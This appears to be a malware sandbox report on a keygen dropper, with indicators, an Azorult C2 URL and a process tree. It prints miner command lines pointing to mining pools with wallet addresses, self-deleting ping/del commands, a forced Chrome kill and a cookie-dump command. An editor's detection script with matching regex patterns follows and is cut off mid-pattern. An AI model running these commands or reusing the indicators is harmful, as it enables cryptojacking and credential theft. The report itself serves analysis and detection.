Analysis
- max time kernel: 8s
- max time network: 61s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 04-04-2021 11:41
- Static task: static1
- Behavioral tasks: behavioral1, behavioral2, behavioral3, behavioral4 (all four ran the same sample, Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe, on resource win10v20201028)

General
- Target: Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
- Size: 5.2MB
- MD5: 8d35cf69c1aca35ce0852f7376102627
- SHA1: 268f27a272d1b6696a9e4abb9270706e0a4cc099
- SHA256: f2ca37f7eb8b9eb1e4eaa55ff92f57cf07107962f53eb58d9471e1c9b296de81
- SHA512: 4156091c5618f1ad50a15a1cca6852353e4b5da9a21203d834c8e163d30d765b74ffde806ec08b6579a5b13f0fd9a0831426452723ea9407ecae858fb1b0ad98
Malware Config
- Extracted: azorult
  C2: http://kvaka.li/1210776429.php
- Extracted: metasploit
  Payload: windows/single_exec
Signatures
- Azorult
  An information stealer, first seen in 2016, that targets browser history and saved passwords.
- Glupteba Payload (1 IoC)
  resource: behavioral1/memory/5820-195-0x0000000000400000-0x0000000000D24000-memory.dmp
  yara_rule: family_glupteba
  (PID 5820 is app.exe in the process tree below.)
- MetaSploit
  Detected a malicious payload that is part of the Metasploit Framework, likely generated with msfvenom or similar.
- XMRig Miner Payload (4 IoCs)
  All four hits are in PID 5124, a process whose image is msiexec.exe but whose command line is a miner's (see the process tree below):
  behavioral1/memory/5124-149-0x0000000140000000-0x000000014070A000-memory.dmp  xmrig
  behavioral1/memory/5124-150-0x00000001402CA898-mapping.dmp  xmrig
  behavioral1/memory/5124-167-0x0000000140000000-0x000000014070A000-memory.dmp  xmrig
  behavioral1/memory/5124-223-0x0000000140000000-0x000000014070A000-memory.dmp  xmrig
- Executes dropped EXE (10 IoCs)
  pid   Process
  4176  keygen-pr.exe
  4200  keygen-step-1.exe
  3292  keygen-step-3.exe
  3984  keygen-step-4.exe
  584   key.exe
  4576  Setup.exe
  1896  multitimer.exe
  2264  setups.exe
  2424  askinstall20.exe
  2648  setups.tmp
- Loads dropped DLL (7 IoCs)
  All seven loads are by PID 2648 (setups.tmp).
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, no IoC listed)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  149   ipinfo.io
  151   ipinfo.io
  195   ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but nothing else in this report points to ransomware; installers and stealers enumerate drives too, so treat this signature as weak on its own.
- Kills process with taskkill (2 IoCs)
  pid   Process
  1352  taskkill.exe
  4468  taskkill.exe
- Modifies system certificate store (2 IoCs)
  description       ioc                                                                                                            Process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349          askinstall20.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted)   askinstall20.exe
  Note that the AuthRoot store is also where Windows caches roots pulled from the Microsoft trusted-root program the first time a chain is validated, so a write here can be a side effect of an HTTPS connection rather than a deliberate root install. Check the thumbprint against the Microsoft CTL before treating it as a planted root.
- Runs ping.exe (1 TTP, 3 IoCs)
  pid   Process
  1464  PING.EXE
  2480  PING.EXE
  5236  PING.EXE
- Script User-Agent (2 IoCs)
  Uses a user-agent string associated with a script host/environment.
  flow  HTTP User-Agent header
  150   Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  159   Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Both events are from PID 2648 (setups.tmp).
- Suspicious use of AdjustPrivilegeToken (35 IoCs)
  pid   Process           Token
  4576  Setup.exe         SeDebugPrivilege
  2424  askinstall20.exe  SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, plus privilege LUIDs 31, 32, 33, 34 and 35 that the sandbox did not resolve to names
  (askinstall20.exe asks for every privilege in the table rather than the one it needs, the usual signature of code that blanket-enables all privileges before doing its work.)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  2264  setups.exe
  2648  setups.tmp
- Suspicious use of WriteProcessMemory (40 IoCs)
  Each raw record reads "PID <parent> wrote to memory of <child> <parent> <parent image> <procid_target>". All 40 are parent-to-child writes that match the process tree below; the same pair is logged once per write, so they collapse to these 14 relationships (write count in parentheses):
  4704 Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe -> 3636  (procid_target 75, x3)
  3636 cmd.exe -> 4176  (procid_target 78, x3)
  3636 cmd.exe -> 4200  (procid_target 79, x3)
  3636 cmd.exe -> 3292  (procid_target 80, x3)
  3636 cmd.exe -> 3984  (procid_target 81, x3)
  4176 keygen-pr.exe -> 584  (procid_target 82, x3)
  3984 keygen-step-4.exe -> 4576  (procid_target 83, x2)
  3292 keygen-step-3.exe -> 1240  (procid_target 85, x3)
  584 key.exe -> 1288  (procid_target 84, x3)
  1240 cmd.exe -> 1464  (procid_target 87, x3)
  4576 Setup.exe -> 1896  (procid_target 88, x2)
  4576 Setup.exe -> 2264  (procid_target 89, x3)
  3984 keygen-step-4.exe -> 2424  (procid_target 90, x3)
  2264 setups.exe -> 2648  (procid_target 91, x3)
Processes
Indented by depth; "cmd:" is the command line as recorded by the sandbox, and the bullets are the signatures attached to that process.

[1] PID 4704  C:\Users\Admin\AppData\Local\Temp\Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\Ciel.Compta.19.0.v.230.00.530.serial.number.keygen.exe"
    - Suspicious use of WriteProcessMemory
  [2] PID 3636  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      - Suspicious use of WriteProcessMemory
    [3] PID 4176  C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        cmd: keygen-pr.exe -p83fsase3Ge
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] PID 584  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] PID 1288  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
    [3] PID 4200  C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        cmd: keygen-step-1.exe
        - Executes dropped EXE
    [3] PID 3292  C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        cmd: keygen-step-3.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] PID 1240  C:\Windows\SysWOW64\cmd.exe
          cmd: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          - Suspicious use of WriteProcessMemory
        [5] PID 1464  C:\Windows\SysWOW64\PING.EXE
            cmd: ping 1.1.1.1 -n 1 -w 3000
            - Runs ping.exe
    [3] PID 3984  C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        cmd: keygen-step-4.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] PID 4576  C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] PID 1896  C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            - Executes dropped EXE
          [6] PID 1228  C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 1 3.1617536499.6069a5f3cfac4 101
            [7] PID 1592  C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\HOM82PKCNZ\multitimer.exe" 2 3.1617536499.6069a5f3cfac4
              [8] PID 5764  C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe" /VERYSILENT
                [9] PID 6008  C:\Users\Admin\AppData\Local\Temp\is-JK79P.tmp\fd1yklpc2qy.tmp
                    cmd: "C:\Users\Admin\AppData\Local\Temp\is-JK79P.tmp\fd1yklpc2qy.tmp" /SL5="$70112,2592217,780800,C:\Users\Admin\AppData\Local\Temp\isehiaue1j5\fd1yklpc2qy.exe" /VERYSILENT
                  [10] PID 6036  C:\Users\Admin\AppData\Local\Temp\is-TF65C.tmp\winlthsth.exe
                       cmd: "C:\Users\Admin\AppData\Local\Temp\is-TF65C.tmp\winlthsth.exe"
              [8] PID 5820  C:\Users\Admin\AppData\Local\Temp\jkfoojgqn5i\app.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\jkfoojgqn5i\app.exe" /8-23
              [8] PID 5924  C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe" /Verysilent /subid=577
                [9] PID 6096  C:\Users\Admin\AppData\Local\Temp\is-IBAH7.tmp\Setup3310.tmp
                    cmd: "C:\Users\Admin\AppData\Local\Temp\is-IBAH7.tmp\Setup3310.tmp" /SL5="$20254,138429,56832,C:\Users\Admin\AppData\Local\Temp\mydk3dlimpy\Setup3310.exe" /Verysilent /subid=577
                  [10] PID 5040  C:\Users\Admin\AppData\Local\Temp\is-SB242.tmp\Setup.exe
                       cmd: "C:\Users\Admin\AppData\Local\Temp\is-SB242.tmp\Setup.exe" /Verysilent
                    [11] PID 6052  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
                      [12] PID 4284  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                           cmd: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    [11] PID 5564  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
                    [11] PID 2164  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
                      [12] PID 2056  C:\Users\Admin\AppData\Local\Temp\is-KDODU.tmp\LabPicV3.tmp
                           cmd: "C:\Users\Admin\AppData\Local\Temp\is-KDODU.tmp\LabPicV3.tmp" /SL5="$2031C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
                    [11] PID 3172  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
                      [12] PID 5636  C:\Users\Admin\AppData\Local\Temp\is-TPD0B.tmp\lylal220.tmp
                           cmd: "C:\Users\Admin\AppData\Local\Temp\is-TPD0B.tmp\lylal220.tmp" /SL5="$20316,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
                    [11] PID 1388  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
                      [12] PID 5536  C:\Windows\SysWOW64\WScript.exe
                           cmd: "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
                    [11] PID 4032  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
                      [12] PID 212  C:\Windows\SysWOW64\WScript.exe
                           cmd: "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                    [11] PID 3504  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
                    [11] PID 5816  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"
                    [11] PID 5812  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
                    [11] PID 5792  C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
                         cmd: "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
              [8] PID 5336  C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                [9] PID 5452  C:\Users\Admin\AppData\Local\Temp\is-S461O.tmp\IBInstaller_97039.tmp
                    cmd: "C:\Users\Admin\AppData\Local\Temp\is-S461O.tmp\IBInstaller_97039.tmp" /SL5="$3041A,14574507,721408,C:\Users\Admin\AppData\Local\Temp\u11gpotvp5c\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                  [10] PID 5620  C:\Windows\SysWOW64\cmd.exe
                       cmd: "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QVQEC.tmp\{app}\microsoft.cab -F:* %ProgramData%
                    [11] PID 3916  C:\Windows\SysWOW64\expand.exe
                         cmd: expand C:\Users\Admin\AppData\Local\Temp\is-QVQEC.tmp\{app}\microsoft.cab -F:* C:\ProgramData
              [8] PID 5516  C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe" /quiet SILENT=1 AF=756
                [9] PID 1896  C:\Windows\SysWOW64\msiexec.exe
                    cmd: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\5vijhsb35vz.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tunffdocdtk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277430 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                    (PID 1896 also appears above as multitimer.exe at depth 5. Windows reuses PIDs once a process has exited, and the sandbox reports them as seen, so the two entries are different processes.)
              [8] PID 6028  C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe" /silent /subid=482
              [8] PID 5964  C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe" /ustwo INSTALL
                [9] PID 1776  C:\Windows\SysWOW64\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "2lp3mo2uzsc.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe" & exit
                  [10] PID 4468  C:\Windows\SysWOW64\taskkill.exe
                       cmd: taskkill /im "2lp3mo2uzsc.exe" /f
                       - Kills process with taskkill
              [8] PID 5912  C:\Users\Admin\AppData\Local\Temp\ztwnbnkbl0j\cpyrix.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\ztwnbnkbl0j\cpyrix.exe" /VERYSILENT
                [9] PID 4428  C:\Users\Admin\AppData\Roaming\1.exe
                    cmd: C:\Users\Admin\AppData\Roaming\1.exe
                  [10] PID 4620  C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\AdvancedRun.exe
                       cmd: "C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7a94642a-8546-4fef-baf3-7c25727323b9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                [9] PID 3404  C:\Users\Admin\AppData\Roaming\2.exe
                    cmd: C:\Users\Admin\AppData\Roaming\2.exe
              [8] PID 5836  C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe"
                [9] PID 4172  C:\Windows\SysWOW64\cmd.exe
                    cmd: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lcruld1scnz\r40cvtx30qm.exe"
                  [10] PID 5236  C:\Windows\SysWOW64\PING.EXE
                       cmd: ping 1.1.1.1 -n 1 -w 3000
                       - Runs ping.exe
              [8] PID 5804  C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe" /VERYSILENT /id=535
        [5] PID 2264  C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe" ll
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
          [6] PID 2648  C:\Users\Admin\AppData\Local\Temp\is-6O0BM.tmp\setups.tmp
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-6O0BM.tmp\setups.tmp" /SL5="$50056,454998,229376,C:\Users\Admin\AppData\Local\Temp\BQVBO4MLFJ\setups.exe" ll
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of SetWindowsHookEx
      [4] PID 2424  C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
          - Executes dropped EXE
          - Modifies system certificate store
          - Suspicious use of AdjustPrivilegeToken
        [5] PID 208  C:\Windows\SysWOW64\cmd.exe
            cmd: cmd.exe /c taskkill /f /im chrome.exe
          [6] PID 1352  C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im chrome.exe
              - Kills process with taskkill
      [4] PID 1044  C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"
        [5] PID 1972  C:\Windows\SysWOW64\WScript.exe
            cmd: "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
          [6] PID 216  C:\Windows\SysWOW64\rundll32.exe
              cmd: "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
      [4] PID 2288  C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        [5] PID 4196  C:\Users\Admin\AppData\Roaming\67A9.tmp.exe
            cmd: "C:\Users\Admin\AppData\Roaming\67A9.tmp.exe"
          [6] PID 184  C:\Windows\system32\msiexec.exe
              cmd: -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
          [6] PID 5124  C:\Windows\system32\msiexec.exe
              cmd: -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
              (Both msiexec.exe children carry miner argument vectors rather than Windows Installer arguments: an Ethereum stratum endpoint on hiveon.net for PID 184 and a Monero pool with an XMRig-style CPU thread hint for PID 5124. The XMRig YARA hits for PID 5124 sit in a 7 MB region at 0x140000000, consistent with a payload image mapped into the 64-bit msiexec.exe process rather than msiexec running its own code.)
        [5] PID 1636  C:\Users\Admin\AppData\Roaming\6894.tmp.exe
            cmd: "C:\Users\Admin\AppData\Roaming\6894.tmp.exe"
        [5] PID 2092  C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
          [6] PID 2480  C:\Windows\SysWOW64\PING.EXE
              cmd: ping 127.0.0.1
              - Runs ping.exe
      [4] PID 4088  C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"

Processes the sandbox recorded without a parent link (shown at depth 1):

[1] PID 4964  C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
[1] PID 3996  C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
[1] PID 1172  C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[1] PID 1672  C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[1] PID 4540  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
[1] PID 6108  C:\Users\Admin\AppData\Local\Temp\is-B7PI4.tmp\vict.tmp
    cmd: "C:\Users\Admin\AppData\Local\Temp\is-B7PI4.tmp\vict.tmp" /SL5="$30274,870426,780800,C:\Users\Admin\AppData\Local\Temp\mtjbekfkubr\vict.exe" /VERYSILENT /id=535
    (Inno Setup second stage of vict.exe, PID 5804 above; the /SL5= argument names the parent installer.)
  [2] PID 5844  C:\Users\Admin\AppData\Local\Temp\is-SJ48A.tmp\win1host.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\is-SJ48A.tmp\win1host.exe" 535
    [3] PID 5864  C:\Users\Admin\AppData\Local\Temp\x4cZKmOP0.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\x4cZKmOP0.exe"
[1] PID 5180  C:\Users\Admin\AppData\Local\Temp\is-1B3OV.tmp\vpn.tmp
    cmd: "C:\Users\Admin\AppData\Local\Temp\is-1B3OV.tmp\vpn.tmp" /SL5="$401D4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fyiq1i44vi4\vpn.exe" /silent /subid=482
    (Inno Setup second stage of vpn.exe, PID 6028 above.)
  [2] PID 4288  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
    [3] PID 5576  C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        cmd: tapinstall.exe remove tap0901
[1] PID 2632  C:\Windows\system32\msiexec.exe
    cmd: C:\Windows\system32\msiexec.exe /V
    (The Windows Installer service instance; it handles the Weather Installation.msi install requested by PID 1896 above.)
  [2] PID 5472  C:\Windows\syswow64\MsiExec.exe
      cmd: C:\Windows\syswow64\MsiExec.exe -Embedding B630AE07EBF19412004C743F453EA5A3 C
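The signatures above are the sandbox's verdicts; the command lines in the tree are the evidence behind them. The script below is an added example by the editor, not part of the Triage report and not the vendor's signature logic: it re-derives four of the behaviours (ping/taskkill-then-delete self-removal, forced browser kill, miner pool arguments, rundll32 calling an `install` export) from the command lines, and adds one check the report does not print as a signature, an image path whose command line never names the image, which is what makes the two msiexec.exe miner children stand out. `PROCESSES` is a hand-copied subset of the PIDs, image paths and command lines printed in the process tree, plus PID 5472 as a negative control; the rule names, regexes and the `Proc`/`scan` helpers are the editor's own.

```python
"""Re-derive behavioural signatures from the command lines in the report.

Added example by the editor, not part of the original Triage report and not
the sandbox's own signature logic. PROCESSES is a hand-copied subset of
(PID, image path, command line) triples from the Processes section; the
rules are illustrative, not an exhaustive detection set.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str    # image path as recorded by the sandbox
    cmdline: str  # command line as recorded by the sandbox


# Constructed from the process tree above (subset, copied verbatim).
PROCESSES = [
    Proc(1240, r"C:\Windows\SysWOW64\cmd.exe",
         r'cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q '
         r'"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"'),
    Proc(1776, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c taskkill /im "2lp3mo2uzsc.exe" /f & erase '
         r'"C:\Users\Admin\AppData\Local\Temp\s5z53r5heil\2lp3mo2uzsc.exe" & exit'),
    Proc(2092, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del '
         r'"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"'),
    Proc(208, r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c taskkill /f /im chrome.exe"),
    Proc(184, r"C:\Windows\system32\msiexec.exe",
         "-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work"
         "@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999"),
    Proc(5124, r"C:\Windows\system32\msiexec.exe",
         "-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8i"
         "GdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999"),
    Proc(216, r"C:\Windows\SysWOW64\rundll32.exe",
         r'"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install'),
    # A normal Windows Installer child process from the tree, kept as a negative control.
    Proc(5472, r"C:\Windows\syswow64\MsiExec.exe",
         r"C:\Windows\syswow64\MsiExec.exe -Embedding B630AE07EBF19412004C743F453EA5A3 C"),
]

# "ping|taskkill ... & del|erase": wait (or kill) first, then remove the dropper's own file.
SELF_DELETE = re.compile(r"\b(ping|taskkill)\b.*[&|]+.*\b(del|erase)\b", re.I)
# Forced browser termination; releases the locks on Chrome's cookie/login databases.
BROWSER_KILL = re.compile(r"taskkill\b.*/im\s+\"?(chrome|msedge|firefox|opera)\.exe", re.I)
# Mining-pool conventions: stratum URLs, "-o host:port", an XMRig flag, pool names seen above.
MINER_ARGS = re.compile(
    r"stratum\d*\+?(ssl|tcp)?://|(^|\s)-o\s+\S+:\d+|--cpu-max-threads-hint|supportxmr|hiveon",
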